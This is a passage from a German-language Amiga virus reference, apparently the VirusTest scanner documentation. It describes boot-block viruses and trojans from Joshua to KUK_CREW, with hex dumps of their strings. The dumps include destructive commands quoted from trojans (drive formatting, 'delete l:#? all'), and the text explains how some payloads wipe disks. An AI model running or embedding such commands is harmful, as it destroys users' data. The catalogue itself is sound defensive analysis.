.XX...XXX........XX.XX.XXXX...X.XX. die Punkte koennen auch durch andere Zeichen belegt sein Hinweis 17.07.93: In letzter Zeit wird wieder eine zunehmende Verseuchung der BBe mit Joshua2 beobachtet. Versuche an einem A600 (OHNE Speichererweiterung) haben gezeigt, dass das Teil bei der Installierung zwar mit einem GURU antwortet (wg.Vec5), nach einem Reset aber ueber COLD weiterhin im Speicher aktiv UND vermehrungsfaehig ist !!!! - Joshua 3 anderer Name und richtig: Joshua2-Virus Es existiert eine BB-Sammlung, die einen wirklichen ByteBandit (aufs Byte im Speicher) Joshua1 nennt. Hieraus ergibt sich dann eine falsche Nummer. Nachtrag: Diese BB-Sammlung wurde inzwischen (15.04.91) in diesem Punkt korrigiert !! - Joshua4-Virus BB BeginIo, Kickmem, KickTag, KickCheckSum, ExecVec5 Es handelt sich um einen Joshua Virus, in dem der Code um einige Bytes verschoben wurde. Im BB ist uncodiert an $8 zu lesen: ANDY Decodiert steht im BB: trackdisk.device,0 *JOSHUA*,0 - JoshuaKill.BB siehe unten bei erkannte Virenfinder - JT-Protec-Virus sofort loeschen Versucht durch Texte zu taeuschen: 00: 444f5300 766df475 00000370 61000072 DOS.vm.u...pa..r ;.... ^^^^^^^^ 40: 4a542056 69727573 2050726f 74656374 JT Virus Protect 50: 6f722031 2e30202d 20546869 73206973 or 1.0 - This is 60: 20612063 7573746f 6d204242 2c20646f a custom BB, do 70: 204e4f54 206b696c 6c206d65 21140048 NOT kill me!..H ^^ 80: e7fffe61 0e4cdf7f ff4e7505 98000141 ...a.L..Nu....A ^^^^^^ ;...... 80808080 002d2042 61736564 206f6e20 .....- Based on 74686520 47524541 54204242 2d766972 the GREAT BB-vir 75737072 6f746563 746f7220 62792047 usprotector by G 454f5247 20483052 4d414e21 2121202d EORG H0RMAN!!! - Zum Glueck ist die Version, die ich besitze NICHT lauf- faehig, da beim zusammensetzen des BBs ein Zaehlfehler unter- gekommen ist. Der Sprungbefehl trifft bei $80 auf einen un- gueltigen Befehl. Waere der Programmteil um 1 Byte verschoben und damit lauffaehig, so wuerde es sich um einen Coder-Clone handeln. - Julie anderer Name Tick oder VIRUS PREDATOR immer $7f800, cool, DoIo, BeginIo und $20 arbeitet nicht sauber mit 1MB Chip testet einige Zeiger und drei Werte (z.B. auf $7ec00) Vermehrung: ohne Warnung ueber (nur ausfuehrbare) BB's decodiert mit not.b (a0)+ steht im Speicher: ` VIRUS PREDATOR (4-88-SPAIN) ID: 027798336 ` also ist der Name Julie eigentlich falsch !! - KaKo-Virus BB Extreme-Clone s.o. Unterschiede zu Extreme: - Rootblockzeiger ($00000370) ersetzt durch "KaKo" = Namensbegruendung - String "dos.library" im BB verlagert - String "intuition.library" im BB verlagert - DisplayAlert-Text jetzt Leerzeichen Rest siehe bei Extreme-Virus Wurde bisher schon als Virus erkannt im BB und im Speicher !!! - KaKoloadwb File Laenge: 2804 Bytes ungepackt T.F.C.loadwb-Clone Aktiviert WB und installiert im Speicher KaKo-Virus-BB . Vermehrung nur als BB moeglich Unterschiede zu T.F.C : - Text am Fileanfang mit teilweise sinnlosen Zeichen ueber- schrieben. Es ist aber auch z.B. loadwb lesbar. - T.F.C.-BB durch KaKo-BB ersetzt. Wurde bisher schon als Virus erkannt bei FileTest und im Speicher !!! - Karacic-Trojan Zerstoerungsfile andere moegliche Namen: - DiskSpeeder-Trojan - GVP-HardDiskSpeeder-Trojan Laenge gepackt: 1460 Bytes Laenge entpackt: 1924 Bytes Keine verbogenen Vektoren KEINE Selbstvermehrung Verwendet einen Funktionsaufruf, der nach meinem Wissensstand erst ab KS3.0 vorhanden ist. Im entpackten File ist z.B. zu lesen: 72756e20 run 3e4e494c 3a207379 733a7379 7374656d >NIL: sys:system 2f666f72 6d617420 64726976 65206864 /format drive hd 343a206e 616d6520 224b6172 61e769e7 4: name "Kara.i. 20566972 75732073 7472696b 65732062 Virus strikes b 61636b22 00007275 6e203e4e 494c3a20 ack"..run >NIL: 433a6465 6c657465 206c3a23 3f20616c C:delete l:#? al 6c00 l. ;..... 733a 6e6f7468 s:noth 65726500 0f4e6f74 206f6e20 74686973 ere..Not on this 2048440a 536e6f6f 70446f73 20537570 HD.SnoopDos Sup 706f7274 2050726f 63657373 0000003f port Process...? 27486172 64446973 6b537065 65646572 'HardDiskSpeeder 2076312e 350a6279 20475650 20496e63 v1.5.by GVP Inc 2e20a931 3939350a 23486172 64446973 . .1995.#HardDis 6b537065 65646572 2076312e 3520696e kSpeeder v1.5 in 7374616c 6c656420 2e2e2e0a stalled .... Ablauf bei start ohne ?: Suche nach SnoopDos. Gefunden = Ende Suche nach File s:nothere Gefunden = Textausgabe: Not on this HD Im Cli wird ausgegeben: HardDiskSpeeder v1.5 installed ... DosDelay-Pause Requester-Ausgabe entweder Funktion Exec-Reboot oder Beginn der Zerstoerung. Formatiert werden sollen dh0-dh4 oder hd0-hd4 Dieser Vorgang MUSS auffallen. Danach sollen noch alle Files in den Verzeichnissen l, libs, devs, s und c geloescht werden. Bei Start mit ? erfolgt die Ausgabe: HardDiskSpeeder v1.5 by GVP Inc. c1995 - Kauki immer $7ec00, Cool, im Prg. $80, $84, $88 im Prg. auch noch DoIo, schreibt aber spaeter im Prg DoIo von KS1.2 zurueck (nach Vermehrung) den meisten Platz brauchen die Chopperlisten. Das ChopperIntro laeuft auch mit KS1.3 . Kauki im BB nicht sichtbar. - Kefrens SCA-Clone Text im BB: Ohh noo!!!! I think something is wrong! and even better... Some of your disks are sick Watch out! By Kefrens offcourse!!! - Kefrens 2 wie Kefrens = SCA-Clone nur Text verschoben - KHOMEINI-Virus MAD II Clone s.u. Nur Texte geaendert. Im BB ist uncodiert zu lesen: 596f7572 20646973 6b287329 20686173 Your disk(s) has 20626565 6e20706f 73736573 73656420 been possessed 62792074 6865204b 484f4d45 494e4920 by the KHOMEINI 56697275 73212121 21204576 656e2061 Virus!!!! Even a 66746572 20686973 20646561 74682068 fter his death h 65207461 6b657320 72657665 6e676521 e takes revenge! 21212048 412d4841 2d48412d 48412020 !! HA-HA-HA-HA - KICK-Virus SADDAM-Clone Blocklangwort: KICK Namensbegruendung: im Speicher ist decodiert zu lesen 6b2e6465 76696365 00010820 204b4943 k.device... KIC 4b202056 49525553 00000000 03f30000 K VIRUS........ 00000000 00010000 00000000 00000000 ................ 01c50000 03e90000 01c55573 65204b69 ..........Use Ki 636b7374 61727420 312e322f 312e3300 ckstart 1.2/1.3. 00000000 00000000 00000000 00000000 ................ Use Kick... ist uncodiert im Disk-Validator-File zu lesen. Behandlung: siehe bei SADDAM 09.04.93 - KidCurry-Trojan siehe bei Biomech-Trojan - Killed Virus BB immer $7EC00, Cool $7EC92, DoIo $7ECCA KS2.04: ja Fordert trackdisk.device NICHT Vermehrung und Schaden: BB Namensbegruendung: im BB zu lesen: 72790020 4b696c6c 65642000 4ef90000 ry. Killed .N... 0000ffff fdf6436f 70793a30 32390000 ......Copy:029.. Beim Boot-Vorgang li.MT Text ueber Graphik heller Hintergrund, dunkle Schrift Copy:029 Danach re. MT: gleiche Farben: Killed - KIMBLE.BB Virus CREEPING EEL Clone siehe oben Vergleiche: Creeping EEL, Executors Nur Text geaendert: (im BB ist zu lesen) 002f0082 54686973 20697320 616e2041 ./..This is an A 6e746976 69727573 3a202020 20200000 ntivirus: .. 001e00b4 4b204920 4d204220 4c204520 ....K I M B L E 2043204f 204d2045 20532020 42204120 C O M E S B A 434b0000 003c00be 20205573 65206974 CK...<.. Use it 2e2ea120 4b494d42 4c452021 20200000 ... KIMBLE ! .. Rest siehe oben bei Creeping EEL - KIMBLE.BB-Inst. File Laenge: 3212 Bytes Mit der Hunklab-Bootjob-Methode wurde der BB an den c-Befehl type angelinkt. 40.3 (11.4.94) ?????? Hunklab-Bootjob s.o. Die Wahrscheinlichkeit, dass ein LAUFFAEHIGER BB entsteht, ist gering. VT bietet Ausbau an. - KUK_CREW-Trojan Zerstoerung Bekannte Filenamen: AMIBLANK.000 1056 Bytes AMIBLANK.020 1056 Bytes Nach File.ID soll es ein Blanker sein. Keine verbogenen Vektoren Keine Vermehrungsroutine Nicht Resetfest VT bietet Loeschen an. Verwendet Dos-Befehle, die erst ab KS2.04 laufen (Inhibit) Im entpackten File ist zu lesen: 3e204b55 4b204352 4557203c 2041204e > KUK CREW < A N 65772061 6e642045 76696c20 47726f75 ew and Evil Grou 70206861 7320636f 6d652074 6f207370 p has come to sp 72656164 20544552 524f5220 616e6420 read TERROR and 44455354 52554354 694f4e20 746f2074 DESTRUCTiON to t 68652041 6d696761 20536365 6e652120 he Amiga Scene! 48414841 48416161 61616161 61616161 HAHAHAaaaaaaaaaa 6800646f 732e6c69 62726172 79005359 h.dos.library.SY 533a0000 4b554b5f 43524557 21004b55 S:..KUK_CREW!.KU 4b5f4352 4557213a 48616861 21004b55 K_CREW!:Haha!.KU 4b5f4352 4557213a 4d722e46 69747461 K_CREW!:Mr.Fitta 5f256c64 00004b55 4b5f4352 4557213a _%ld..KUK_CREW!: 44722e4b 6c697474 615f256c 64004b55 Dr.Klitta_%ld.KU 4b5f4352 4557213a 4b756b2b 46697474 K_CREW!:Kuk+Fitt 613d4261 726e5f25 6c640000 4b554b5f a=Barn_%ld..KUK_ 43524557 213a4b69 73732642 616a73c4 CREW!:Kiss&Bajs. 724e6963 655f256c 64004e71 rNice_%ld.Nq Ablauf: Das Medium SYS: wird mit dem Namen KUK_CREW! schnellformatiert. Ein Rettung soll verhindert werden. Deshalb werden Files mit verschiedenen Namen (Haha! usw.) und verschiedener Laenge (z.B. #200000 usw.) mehrfach (z.B. #50x) aufkopiert. Diese Files enthalten am Anfang den Text >KUK CREW usw. und dann Muell. Da ist NICHTS mehr zu retten, falls Sie nicht sofort einen Reset durchfuehren. -------------------------------------------------------------------------- Heiner Schneegold Am Steinert 8 97246 Eibelstadt Deutschland Tel: 09303/99104 (bitte nur 19.00 - 20.00 Uhr) EMail: Heiner.Schneegold@t-online.de Heiner Amiga ist ein eingetragenes Warenzeichen von Gateway 2000